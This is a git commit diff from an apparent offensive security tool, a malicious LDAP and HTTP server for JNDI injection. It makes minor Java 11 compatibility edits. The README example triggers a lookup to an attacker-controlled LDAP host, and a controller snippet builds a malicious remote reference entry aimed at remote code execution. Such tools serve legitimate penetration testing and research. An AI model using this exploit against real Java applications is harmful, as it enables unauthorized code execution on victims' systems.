Make it compatible with java11

5 years ago · 6af18485a8
parent 2f7e814f60
commit 6af18485a8
4 changed files with 6 additions and 9 deletions
--- a/README.md
+++ b/README.md
@ -3,11 +3,11 @@ A malicious LDAP server for JNDI injection attacks.

 ### Description
 The project contains LDAP & HTTP servers for exploiting insecure-by-default Java JNDI API.<br> 
-In order to perform an attack, you can start these servers localy and then trigger a JNDI resolution on the vulnerable client, e.g.: 
+In order to perform an attack, you can start these servers locally and then trigger a JNDI resolution on the vulnerable client, e.g.:
 ```java
 InitialContext.lookup("ldap://your_server.com:1389/o=reference");
 ```
-It will initiate a connection from the vulnerable clinet to the local LDAP server. 
+It will initiate a connection from the vulnerable client to the local LDAP server.
 Then, the local server responds with a malicious entry containing one of the payloads, that can be useful to achieve a Remote Code Execution. 

 ### Motivation
@ -62,7 +62,6 @@ Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere
 Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
 ```

-
 ### Building
 Java v1.7+ and Maven v3+ required
 ```
--- a/pom.xml
+++ b/pom.xml
@ -35,7 +35,7 @@
        <dependency>
            <groupId>org.reflections</groupId>
            <artifactId>reflections</artifactId>
-            <version>0.9.11</version>
+            <version>0.9.12</version>
        </dependency>

        <dependency>
@ -83,8 +83,8 @@
                <artifactId>maven-compiler-plugin</artifactId>
                <version>3.8.1</version>
                <configuration>
-                    <source>7</source>
-                    <target>7</target>
+                    <source>8</source>
+                    <target>8</target>
                </configuration>
            </plugin>
        </plugins>
--- a/src/main/java/artsploit/HttpServer.java
+++ b/src/main/java/artsploit/HttpServer.java
@ -6,10 +6,8 @@ import javassist.ClassPool;
 import javassist.CtClass;
 import javassist.CtConstructor;
 import org.apache.commons.lang3.reflect.FieldUtils;
-import org.reflections.Reflections;

 import java.io.ByteArrayOutputStream;
-import java.lang.reflect.Field;
 import java.net.InetSocketAddress;
 import java.util.concurrent.Executors;
 import java.util.jar.JarOutputStream;
--- a/src/main/java/artsploit/controllers/RemoteReference.java
+++ b/src/main/java/artsploit/controllers/RemoteReference.java
@ -29,7 +29,7 @@ public class RemoteReference implements LdapController {

    public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
        Entry e = new Entry(base);
-        System.out.println("Sending LDAP reference result for " + classloaderUrl);
+        System.out.println("Sending LDAP reference result for " + classloaderUrl + "xExportObject.class");
        e.addAttribute("objectClass", "javaNamingReference");
        e.addAttribute("javaClassName", "xUnknown"); //could be any unknown
        e.addAttribute("javaFactory", "xExportObject"); //could be any unknown